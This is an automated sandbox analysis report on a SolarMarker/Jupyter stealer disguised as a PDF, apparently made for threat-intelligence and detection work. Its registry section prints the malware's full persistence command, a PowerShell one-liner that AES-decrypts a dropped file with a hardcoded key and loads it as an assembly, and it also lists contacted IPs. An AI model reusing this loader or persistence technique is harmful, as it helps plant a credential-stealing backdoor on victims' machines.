Malware Analysis Report

2024-10-16 02:55

Sample ID: 230221-rawxqafa28
Target: $RZJBSB5.pdf
SHA256: 30fdcbb1f2999987df2eb6b32c6b0863487f3a55dc6ca65b0e9ef14a2234be15
Tags: jupyter backdoor stealer trojan
Score: 10/10

Table of Contents

Analysis Overview
  MITRE ATT&CK
Analysis: static1
  Detonation Overview
  Signatures
Analysis: behavioral1
  Detonation Overview
  Command Line
  Signatures
  Processes
  Network
  Files
Analysis: behavioral2
  Detonation Overview
  Command Line
  Signatures
  Processes
  Network
  Files

Analysis Overview

Score: 10/10

SHA256: 30fdcbb1f2999987df2eb6b32c6b0863487f3a55dc6ca65b0e9ef14a2234be15

Threat Level: Known bad

The file $RZJBSB5.pdf was found to be: Known bad.

Malicious Activity Summary

Tags: jupyter backdoor stealer trojan

Family: Jupyter, SolarMarker

Blocklisted process makes network request

Drops startup file

Modifies registry class

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

MITRE ATT&CK

N/A

Analysis: static1

Detonation Overview

Reported: 2023-02-21 14:00

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted: 2023-02-21 13:59
Reported: 2023-02-21 14:23
Platform: win10-20230220-en
Max time kernel: 599s
Max time network: 602s

Command Line

"C:\Users\Admin\AppData\Local\Temp\$RZJBSB5.exe"

Signatures

Jupyter, SolarMarker

Tags: backdoor trojan stealer jupyter

Blocklisted process makes network request

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A

Drops startup file

Description | Indicator | Process | Target
File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\w2srnyagayd.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A

Modifies registry class

Description | Indicator | Process | Target
Set value (str) | \REGISTRY\USER\S-1-5-21-3853465373-1718857667-1861325682-1000_Classes\24eeurs1ylq\shell\open\command\ = "powershell -command \"$A=New-Object System.Security.Cryptography.AesCryptoServiceProvider;$A.Key=@([byte]133,165,236,47,97,52,224,19,17,83,18,190,103,228,59,187,224,102,137,106,50,192,211,70,56,15,156,77,135,31,120,97);$A.IV=@([byte]124,49,69,244,29,153,237,162,142,248,178,31,144,35,21,204);$F=[Convert]::FromBase64String([IO.File]::ReadAllText('C:\\Users\\Admin\\qkge3jcwqpk.4fiogvf051v'));[Reflection.Assembly]::Load($A.CreateDecryptor().TransformFinalBlock($F,0,$F.Length));[tFRnUqM6yokMORTCQTcvWCNIieWokxn21zabD9OzPw40x3pcfb04HUoG0z7TBgb.r2Ha19C5g7CkWUOInFr4I9c9xo2lUSHVWqP2RCpVIUHvcpSfZcOsQQGGs]::crfL33M9t_IvR8F8mDk9Ki72QQRB0VSBdq_bNHIG84_k();\"" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-3853465373-1718857667-1861325682-1000_Classes\.4fiogvf051v | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Set value (str) | \REGISTRY\USER\S-1-5-21-3853465373-1718857667-1861325682-1000_Classes\.4fiogvf051v\ = "24eeurs1ylq" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-3853465373-1718857667-1861325682-1000_Classes\24eeurs1ylq\shell\open\command | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-3853465373-1718857667-1861325682-1000_Classes\24eeurs1ylq | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-3853465373-1718857667-1861325682-1000_Classes\24eeurs1ylq\shell | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-3853465373-1718857667-1861325682-1000_Classes\24eeurs1ylq\shell\open | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A

Suspicious use of AdjustPrivilegeToken

Description | Indicator | Process | Target
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A

Suspicious use of WriteProcessMemory

Description | Indicator | Process | Target
PID 4144 wrote to memory of 3924 | N/A | C:\Users\Admin\AppData\Local\Temp\$RZJBSB5.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4144 wrote to memory of 3924 | N/A | C:\Users\Admin\AppData\Local\Temp\$RZJBSB5.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Processes

C:\Users\Admin\AppData\Local\Temp\$RZJBSB5.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\$RZJBSB5.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  Command line: powershell

Network

Country | Destination | Domain | Proto
FR | 40.79.141.152:443 | | tcp
NL | 88.221.25.155:80 | | tcp
PL | 146.70.161.126:80 | 146.70.161.126 | tcp
US | 8.8.8.8:53 | 126.161.70.146.in-addr.arpa | udp

Files

memory/3924-120-0x0000022F52AE0000-0x0000022F52B02000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_xjrf1x24.5pi.ps1
  MD5: c4ca4238a0b923820dcc509a6f75849b
  SHA1: 356a192b7913b04c54574d18c28d46e6395428ab
  SHA256: 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
  SHA512: 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/3924-147-0x0000022F6B0E0000-0x0000022F6B11C000-memory.dmp
memory/3924-158-0x0000022F6B6A0000-0x0000022F6B716000-memory.dmp
memory/3924-163-0x0000022F52B40000-0x0000022F52B50000-memory.dmp
memory/3924-164-0x0000022F52B40000-0x0000022F52B50000-memory.dmp
memory/3924-169-0x0000022F52B40000-0x0000022F52B50000-memory.dmp
memory/3924-170-0x0000022F52B40000-0x0000022F52B50000-memory.dmp
memory/3924-243-0x0000022F52B40000-0x0000022F52B50000-memory.dmp
memory/3924-249-0x0000022F6B190000-0x0000022F6B21E000-memory.dmp
memory/3924-254-0x0000022F52B40000-0x0000022F52B50000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted: 2023-02-21 13:59
Reported: 2023-02-21 14:23
Platform: win10v2004-20230220-en
Max time kernel: 80s
Max time network: 149s

Command Line

"C:\Users\Admin\AppData\Local\Temp\$RZJBSB5.exe"

Signatures

Suspicious behavior: EnumeratesProcesses

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A

Suspicious use of AdjustPrivilegeToken

Description | Indicator | Process | Target
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A

Suspicious use of WriteProcessMemory

Description | Indicator | Process | Target
PID 2140 wrote to memory of 1028 | N/A | C:\Users\Admin\AppData\Local\Temp\$RZJBSB5.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2140 wrote to memory of 1028 | N/A | C:\Users\Admin\AppData\Local\Temp\$RZJBSB5.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Processes

C:\Users\Admin\AppData\Local\Temp\$RZJBSB5.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\$RZJBSB5.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  Command line: powershell

Network

Country | Destination | Domain | Proto
US | 8.8.8.8:53 | 240.232.18.117.in-addr.arpa | udp
US | 117.18.237.29:80 | | tcp
NL | 173.223.113.131:80 | | tcp

Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_kfgvnuzf.rbq.ps1
  MD5: d17fe0a3f47be24a6453e9ef58c94641
  SHA1: 6ab83620379fc69f80c0242105ddffd7d98d5d9d
  SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
  SHA512: 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/1028-142-0x000002BB60900000-0x000002BB60922000-memory.dmp
memory/1028-143-0x000002BB60980000-0x000002BB609C4000-memory.dmp
memory/1028-144-0x000002BB60DF0000-0x000002BB60E66000-memory.dmp
memory/1028-146-0x000002BB456E0000-0x000002BB456F0000-memory.dmp
memory/1028-145-0x000002BB456E0000-0x000002BB456F0000-memory.dmp
memory/1028-147-0x000002BB456E0000-0x000002BB456F0000-memory.dmp
memory/1028-148-0x000002BB456E0000-0x000002BB456F0000-memory.dmp
memory/1028-149-0x000002BB456E0000-0x000002BB456F0000-memory.dmp
memory/1028-150-0x000002BB456E0000-0x000002BB456F0000-memory.dmp